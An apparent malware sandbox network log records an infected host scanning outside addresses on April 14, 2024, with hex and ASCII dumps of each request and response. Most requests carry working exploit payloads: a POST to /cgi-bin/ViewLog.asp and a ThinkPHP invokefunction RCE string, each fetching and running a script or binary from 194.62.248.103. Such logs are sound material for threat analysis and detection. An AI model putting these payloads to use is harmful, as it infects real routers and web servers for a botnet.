                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:30.137082100 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:46.006999969 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:18.258517981 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        502192.168.2.235908488.221.226.11380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:15.075692892 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:15.397731066 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:36:15 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:15 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 63 30 63 31 35 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 33 37 35 26 23 34 36 3b 32 35 63 66 64 64 31 37 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 39 63 30 63 31 35 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 33 37 35 26 23 34 36 3b 32 35 63 66 64 64 31 37 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;9c0c1502&#46;1713105375&#46;25cfdd17<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;9c0c1502&#46;1713105375&#46;25cfdd17</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        503192.168.2.235520295.42.62.1698080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:15.079370975 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:15.405328989 CEST390INHTTP/1.1 401 Unauthorized
                                                        Server: nginx/1.3.0
                                                        Date: Sun, 14 Apr 2024 17:36:15 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 194
                                                        Connection: keep-alive
                                                        WWW-Authenticate: Basic realm="WISPR"
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 33 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>401 Authorization Required</title></head><body bgcolor="white"><center><h1>401 Authorization Required</h1></center><hr><center>nginx/1.3.0</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        504192.168.2.234929431.200.119.1558080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:15.094774008 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        505192.168.2.235279294.123.177.2348080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:15.095596075 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        506192.168.2.235876888.201.61.14380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:15.169143915 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:15.575956106 CEST1289INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Server: gvs 1.0
                                                        Connection: Close
                                                        Content-Length: 1555
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78
                                                        Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 400 (Bad Request)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x
                                                        Apr 14, 2024 16:36:15.576000929 CEST503INData Raw: 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67
                                                        Data Ascii: 54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;h


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        507192.168.2.235876688.201.61.14380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:15.169178009 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:15.576147079 CEST1289INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Server: gvs 1.0
                                                        Connection: Close
                                                        Content-Length: 1555
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78
                                                        Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 400 (Bad Request)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x
                                                        Apr 14, 2024 16:36:15.576183081 CEST503INData Raw: 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67
                                                        Data Ascii: 54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;h


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        508192.168.2.2336554112.126.97.20080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:15.406871080 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:15.738286018 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:36:16 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        509192.168.2.2344398112.126.68.20980
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:15.516801119 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:15.864420891 CEST307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:36:15 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        510192.168.2.234019895.86.85.288080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:15.728863955 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
